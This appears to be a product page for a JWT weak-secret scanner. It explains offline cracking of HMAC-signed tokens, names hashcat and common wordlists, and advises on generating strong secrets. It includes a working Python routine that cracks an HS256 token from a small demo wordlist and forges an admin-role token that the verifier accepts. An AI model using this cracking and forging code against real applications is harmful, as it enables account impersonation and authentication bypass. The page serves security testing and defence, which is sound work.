Category: Authentication | Severity: High

JWT Weak Secret Scanner

Brute forces weak JWT signing secrets for token forgery.

What is JWT Weak Secret?

JWT weak-secret vulnerabilities occur when an application signs its JWTs with an HMAC algorithm (HS256, HS384 or HS512) using a secret that is short, predictable, or common. Because a token carries both the signed data (header and payload) and the signature, anyone holding one valid token can recompute the HMAC under candidate secrets entirely offline: no requests go to the target, so there is nothing for the application to rate-limit, lock out, or log. Once the secret is recovered, the attacker can mint tokens with arbitrary claims that pass signature verification and bypass authentication entirely.

Why is This Important?

Many applications sign tokens with secrets like 'secret', 'password', a company name, or a value copied from library documentation. Wordlist attacks with tools such as hashcat or jwt-cracker recover such secrets in seconds to minutes. With the secret in hand, an attacker can impersonate any user, including administrators, and because the forged tokens carry valid signatures they are indistinguishable from legitimate ones at the verification step: the application sees no failed logins and no rejected tokens, so the compromise is invisible unless the forged claims themselves look anomalous.

How It Works

1. Auth Flow Analysis

Maps authentication mechanisms including login, registration, password reset, and session management flows.

2. Security Testing

Tests for authentication bypasses, weak credentials, session flaws, and token vulnerabilities.

3. Access Verification

Validates findings by demonstrating unauthorized access or privilege escalation paths.

Key Capabilities

Comprehensive authentication security testing to protect user accounts and prevent unauthorized access.

  • Complete authentication flow analysis
  • Token and session security validation
  • Password policy and brute-force testing
  • Multi-factor authentication bypass detection
  • OAuth, SAML, and JWT security assessment

Frequently Asked Questions

How fast can JWT secrets be cracked?

Secrets that appear in a common wordlist are recovered almost instantly. Short secrets can be exhausted by brute force, but how quickly depends on the character set as much as the length: a single high-end GPU running hashcat against HS256 tests on the order of billions of candidates per second, which finishes an 8-character lowercase-only keyspace (26^8, about 2×10^11) in about a minute, whereas a 10-character secret drawn from all 95 printable ASCII characters (95^10, about 6×10^19) would take centuries at that rate. What matters is guessability: a 32-byte secret from a cryptographic random generator has 256 bits of entropy and is out of reach of any brute force.

What makes a JWT secret weak?

Weak secrets include: dictionary words, company/app names, short strings, patterns (123456, qwerty), secrets in code repositories, default values from documentation, and anything that might appear in a wordlist or be guessable.

What tools are used to crack JWT secrets?

Popular tools include: hashcat (GPU-accelerated and fastest; its hash mode 16500 takes a JWT directly), John the Ripper, jwt-cracker, jwt_tool, and custom scripts. Wordlists like rockyou.txt and SecLists contain millions of common passwords and patterns, and rule-based mutations (appending years, digits, or symbols) extend them to the variants developers typically choose.

How should I generate a strong JWT secret?

Generate at least 256 bits (32 bytes) of cryptographically random data; this is the minimum RFC 7518 requires for HS256, which mandates a key at least as long as the hash output. Use openssl rand -base64 32 or similar. Never derive the secret from a human-readable phrase, and have the service refuse to start if the configured secret is shorter than 32 bytes, so a default or placeholder value cannot reach production. Store secrets in a secure secret management system, rotate them periodically (carrying a key identifier, kid, in the token header so tokens issued under the previous key still verify during rotation), and never commit them to repositories. Where many services verify tokens, consider an asymmetric algorithm such as RS256 or ES256 so the signing key never leaves the issuer and verifiers hold only the public key.
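The offline attack described above, followed by the secret generation this answer recommends, as an added Python example that is not the scanner's own code. The token, the claims and the five-entry wordlist are constructed for the demo; a real attack would hand a full wordlist to hashcat or jwt-cracker instead of this loop. Only the standard library is used.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Iterable, Optional

# Added example (not the scanner's code): offline cracking of an
# HS256-signed JWT, forging a token with the recovered secret, and
# generating a secret that the same attack cannot recover. The token,
# claims and WORDLIST below are constructed for the demo.


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Build a compact JWT signed with HMAC-SHA256 over header.payload."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        _b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, claims)
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url_encode(sig)}"


def crack_hs256(token: str, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute the HMAC under each candidate
    secret and compare it with the signature carried in the token."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"not an HS256 token: {header.get('alg')!r}")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    target = _b64url_decode(sig_b64)
    for candidate in candidates:
        guess = hmac.new(candidate, signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return candidate
    return None


def forge_admin_token(token: str, secret: bytes) -> str:
    """Re-sign the captured token's claims with the role escalated to admin."""
    claims = json.loads(_b64url_decode(token.split(".")[1]))
    claims["role"] = "admin"
    return sign_hs256(claims, secret)


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Server-side check. It is the attacker's computation with a single
    candidate, which is why the crack needs nothing the server has."""
    if crack_hs256(token, [secret]) is None:
        return None
    return json.loads(_b64url_decode(token.split(".")[1]))


def generate_secret() -> bytes:
    """256 bits from the OS CSPRNG, the size RFC 7518 requires for HS256."""
    return secrets.token_bytes(32)


# Constructed five-entry wordlist standing in for rockyou.txt / SecLists.
WORDLIST = [w.encode() for w in ["123456", "password", "qwerty", "secret", "acme2024"]]


def demo() -> dict:
    weak_token = sign_hs256({"sub": "alice", "role": "user"}, b"secret")
    found = crack_hs256(weak_token, WORDLIST)
    forged = forge_admin_token(weak_token, found)
    # The server accepts the forged token: its signature is valid.
    accepted = verify_hs256(forged, b"secret")
    strong_token = sign_hs256({"sub": "alice", "role": "user"}, generate_secret())
    return {
        "recovered": found,
        "forged_role": accepted["role"] if accepted else None,
        "strong_cracked": crack_hs256(strong_token, WORDLIST),
    }


if __name__ == "__main__":
    print(demo())
```

Running the block cracks the weak token to 'secret', gets a forged admin token accepted by the verifier, and shows the wordlist attack failing against the random secret. Against a real target the only change is the candidate source; the verification step an attacker reproduces is identical.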
